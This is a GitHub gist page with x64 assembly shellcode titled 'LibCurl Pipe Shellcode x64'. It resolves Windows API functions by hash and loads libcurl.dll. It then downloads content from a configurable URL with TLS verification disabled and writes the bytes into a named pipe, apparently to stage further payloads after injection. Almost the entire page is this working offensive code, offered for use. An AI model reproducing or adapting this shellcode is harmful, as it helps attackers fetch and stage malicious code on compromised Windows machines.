Skip to content

Instantly share code, notes, and snippets.

@phikshun

phikshun/https_curl_pipe64.asm

Created September 3, 2012 18:02
Show Gist options
  • Save phikshun/3611491 to your computer and use it in GitHub Desktop.
Save phikshun/3611491 to your computer and use it in GitHub Desktop.
Download ZIP
LibCurl Pipe Shellcode x64
Raw
https_curl_pipe64.asm
%define u(x) __utf16__(x)
[BITS 64]
[ORG 0]
cld ; Clear the direction flag.
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
mov rsi, rsp ; ESI points to the current postion of the stack (for ref local var)
sub rsp, 0x2000 ; Allocate some stack space
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta:
%include "block_api64.asm"
start:
pop rbp ; Pop off the address of 'api_call' for calling later.
mov qword [rsi-64], rbp ; We'll need this later
xor rax, rax
push rax ; NULL
push rax ; NULL
push 3 ; OPEN_EXISTING
xor r9, r9
xor r8, r8
mov rdx, 0x40000000 ; GENERIC_WRITE
lea rcx, [rel szPipeName]
mov r10d, 0x4FDAF6DA ; CreateFileA("\\\\.\\pipe\\foo", GENERIC_WRITE,
call rbp ; NULL, NULL, OPEN_EXISTING, NULL, NULL);
xor rcx, rcx
sub rcx, 1
cmp rax, rcx
je error_found ; INVALID_HANDLE_VALUE = -1
mov qword [rsi-56], rax ; [rsi-56] => hFile
lea rcx, [rel szLibcurl]
mov r10d, 0x0726774C
call rbp ; LoadLibraryA("libcurl.dll");
test rax, rax ; make sure libcurl.dll can be found
jz error_found
mov qword [rsi], rax ; [rsi-0] => hModuleLibcurl
lea rdx, [rel szCurlGlobalInit]
mov rcx, [rsi]
mov r10d, 0x7802F749
call rbp ; GetProcAddress(hModuleLibcurl, szCurlGlobalInit);
mov qword [rsi-8], rax ; [rsi-4] => curl_global_init
lea rdx, [rel szCurlEasyInit]
mov rcx, [rsi]
mov r10d, 0x7802F749
call rbp ; GetProcAddress(hModuleLibcurl, szCurlEasyInit);
mov qword [rsi-16], rax ; [rsi-16] => curl_easy_init
lea rdx, [rel szCurlEasySetopt]
mov rcx, [rsi]
mov r10d, 0x7802F749
call rbp ; GetProcAddress(hModuleLibcurl, szCurlEasySetopt);
mov qword [rsi-24], rax ; [rsi-24] => curl_easy_setopt
lea rdx, [rel szCurlEasyPerform]
mov rcx, [rsi]
mov r10d, 0x7802F749
call rbp ; GetProcAddress(hModuleLibcurl, szCurlEasyPerform);
mov qword [rsi-32], rax ; [rsi-32] => curl_easy_perform
lea rdx, [rel szCurlEasyCleanup]
mov rcx, [rsi]
mov r10d, 0x7802F749
call rbp ; GetProcAddress(hModuleLibcurl, szCurlEasyCleanup);
mov qword [rsi-40], rax ; [rsi-40] => curl_easy_cleanup
mov rcx, 3 ; (CURL_GLOBAL_WIN32 | CURL_GLOBAL_SSL)
push rcx
call qword [rsi-8] ; curl_global_init
call qword [rsi-16] ; curl_easy_init
mov qword [rsi-48], rax ; [rsi-48] => CURL *curl
test rax, rax ; make sure that curl is loaded
jz error_found
lea r8, [rel post_params]
xor rbx, rbx
mov bl, byte [r8]
test rbx, rbx ; test first byte of post_params
jz skip_post ; to see if we are making a post req
push r8
mov rdx, 10015 ; CURLOPT_POSTFIELDS
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_POSTFIELDS, post_params );
xor r8, r8
inc r8 ; POST=1
push r8
mov rdx, 47 ; CURLOPT_POST
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_POSTFIELDS, post_params );
skip_post:
lea r8, [rel server_url] ; Url
push r8
mov rdx, 10002 ; CURLOPT_URL
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_URL, server_url );
lea r8, [rel start_pipe] ; start_pipe
push r8
mov rdx, 20011 ; CURLOPT_WRITEFUNCTION
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, start_pipe );
mov r8, rsi ; pVariables
push r8
mov rdx, 10001 ; CURLOPT_WRITEDATA
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_WRITEDATA, pVariables );
xor r8, r8 ; 0L
push r8
mov rdx, 64 ; CURLOPT_SSL_VERIFYPEER
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYPEER, 0L );
xor r8, r8 ; 0L
push r8
mov rdx, 81 ; CURLOPT_SSL_VERIFYHOST
push rdx
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-24] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYHOST, 0L );
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-32] ; curl_easy_perform(curl);
mov rcx, qword [rsi-48] ; *curl
push rcx
call qword [rsi-40] ; curl_easy_cleanup(curl);
error_found:
xor rcx, rcx ;
mov r10d, 0x6F721347 ; ntdll.dll!RtlExitUserThread
call rbp ; call EXITFUNK( 0 );
start_pipe:
push rbp
mov rbp, rsp
sub rsp, 16
push rdi
push rsi
push rbx
mov rsi, r9 ; Save WRITEDATA in rsi
mov rdi, rcx ; Save buffer in rdi
xor rax, rax
mov qword [rbp-8], rax
lea r9, [rbp-8] ; Allocate for dwBytesWritten
mov rax, rdx ; size
mov rcx, r8 ; nmemb
mul rcx ; result in rax
mov r8, rax
xor rax, rax
push rax ; NULL
mov rdx, rdi ; pointer to buffer
mov rcx, qword [rsi-56] ; rsi is pointing to WRITEDATA. referencing hFile here.
mov r10d, 0x5BAE572D
call qword [rsi-64] ; WriteFile( hFile, buffer, dwSize, &dwBytesWritten, NULL);
add rsp, 40
pop rbx
pop rsi
pop rdi
mov rsp, rbp
pop rbp
ret
szPipeName:
db '\\.\pipe\foo', 0
times 4 db 0
szLibcurl:
db 'libcurl.dll', 0
szCurlGlobalInit:
db 'curl_global_init', 0
szCurlEasyInit:
db 'curl_easy_init', 0
szCurlEasySetopt:
db 'curl_easy_setopt', 0
szCurlEasyPerform:
db 'curl_easy_perform', 0
szCurlEasyCleanup:
db 'curl_easy_cleanup', 0
server_url:
db 'http://www.google.ca/s?q=lolcat', 0
times 32 db 0
post_params:
db 0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment